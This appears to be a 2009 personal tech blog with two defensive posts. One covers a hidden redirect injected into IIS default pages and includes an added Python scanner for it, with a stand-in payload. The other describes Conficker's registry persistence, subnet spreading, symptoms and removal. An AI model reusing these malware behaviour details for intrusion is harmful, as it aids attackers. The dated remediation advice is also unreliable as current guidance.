Tanmaya Thopate, Chincholi Morachi, Low cost WEBSITE development in Pune, Windows Tips n Tricks

Saturday, March 7, 2009

Java Injection code in IIS

If you are annoyed by injections in your web site pages, the following may help. Here is the JavaScript code of one such “injection” that inserts itself into the default page of a website. It is designed to stay hidden by redirecting only at random.

Generally this code is inserted at the bottom of the source of the index or default page, after a considerable amount of white space following the end of the normal source. It redirects to a “spyware” or “virus” site, and it is not detected by antivirus programs.

It infects .php files and does not re-infect them after the initial infection. Generally it injects the code into .php (and .html) files about 115 lines below the last line of the normal code. It ONLY infects index.php/index.html files in the httpdocs directory of the website.

If you rename the file to some other name, such as index2.php, it will not be infected. The “modified date” time stamp also changes with the infection. Once you know the time stamp of the infection, search for files modified at that time.

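As an added defensive example (not code from the original post), the Python scan below applies the post's own indicators: it walks a document root, flags only index.php/index.html files whose tail has a long run of blank lines followed by an eval() call (the post's sample ends in an eval() of the decoded string), and lists every file modified within a window of a hit's time stamp. The 20-blank-line threshold, the sample directory layout and the stand-in payload string are constructed assumptions.

```python
import os
import re
import tempfile
from pathlib import Path

TARGET_NAMES = {"index.php", "index.html"}  # the post: only default pages get modified
# A gap of >=20 blank lines (assumed threshold) followed by an eval() of decoded text.
BLANK_RUN = re.compile(r"(?:\r?\n[ \t]*){20,}")
EVAL_CALL = re.compile(r"\beval\s*\(")

def scan_file(path):
    """Return the offset where a suspicious trailing block starts, else None."""
    content = Path(path).read_text(encoding="utf-8", errors="replace")
    gaps = list(BLANK_RUN.finditer(content))  # every long blank run in the file
    if gaps and EVAL_CALL.search(content[gaps[-1].end():]):
        return gaps[-1].end()  # only the gap before the trailing block counts
    return None

def scan_docroot(root):
    """Walk a document root; map each suspicious default page to its mtime (epoch seconds)."""
    hits = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower() in TARGET_NAMES:
                path = os.path.join(dirpath, name)
                if scan_file(path) is not None:
                    hits[path] = os.path.getmtime(path)
    return hits

def modified_near(root, when, window=300):
    """Every file under root whose mtime is within +/- window seconds of 'when'."""
    found = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            if abs(os.path.getmtime(path) - when) <= window:
                found.append(path)
    return sorted(found)

def build_sample_docroot():
    """Constructed tree: clean page, injected page, and a renamed copy the scan skips."""
    root = tempfile.mkdtemp()
    Path(root, "site2").mkdir()
    clean = "<html><body>hello</body></html>\n"
    injected = clean + "\n" * 115 + 'var mf="...";eval(rmhc);\n'  # stand-in payload
    for rel, body in {"index.php": clean, "site2/index.html": injected,
                      "index2.php": injected}.items():
        Path(root, rel).write_text(body)
    return root

if __name__ == "__main__":
    for path, mtime in scan_docroot(build_sample_docroot()).items():
        print(f"suspicious: {path} (mtime {mtime:.0f})")
```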

Sunday, March 1, 2009

Unable to connect to Microsoft website

Conficker is also known as Worm:Win32/Conficker.A and Worm:Win32/Conficker.B by Microsoft, Crypt.AVL by AVG, Trojan.Win32.Pakes.lxf by F-Secure and Trojan.Win32.Pakes.lxf by Kaspersky.
It copies itself under a random name to the %Sysdir% folder.

It modifies the registry to create a randomly-named service on the compromised system:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\{random}\Parameters\"ServiceDll" = "Path to worm"
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\{random}\"ImagePath" = %SystemRoot%\system32\svchost.exe -k netsvcs

It tries to connect to multiple websites to obtain the public IP address of the infected computer. It attempts to download a malware file from the remote website. It starts an HTTP server on a random port on the infected machine to host a copy of the worm.

Once one system on the network is infected, it continuously scans the whole subnet of the infected host for vulnerable machines and executes the exploit. If it succeeds, that computer connects back to the HTTP server and downloads a copy of the worm. Later variants of W32/Conficker.worm use scheduled tasks and Autorun.inf files to spread to non-vulnerable systems or to re-infect previously infected systems even after they have been cleaned.

How can you check whether your system is infected?
You may find that you are unable to connect not only to the Microsoft website but also to anti-virus websites.
On an infected system, users are locked out of the directory, access to admin shares is denied, scheduled tasks get created, and access to security-related web sites is blocked.

Conficker removal tool from Microsoft

The remedy for this issue is to patch and reboot the infected system. If you detect this worm on your system, reboot to clear memory correctly; you may need to reboot more than once. Scheduled tasks are created on the system to re-activate the worm, and Autorun.inf files also re-activate it.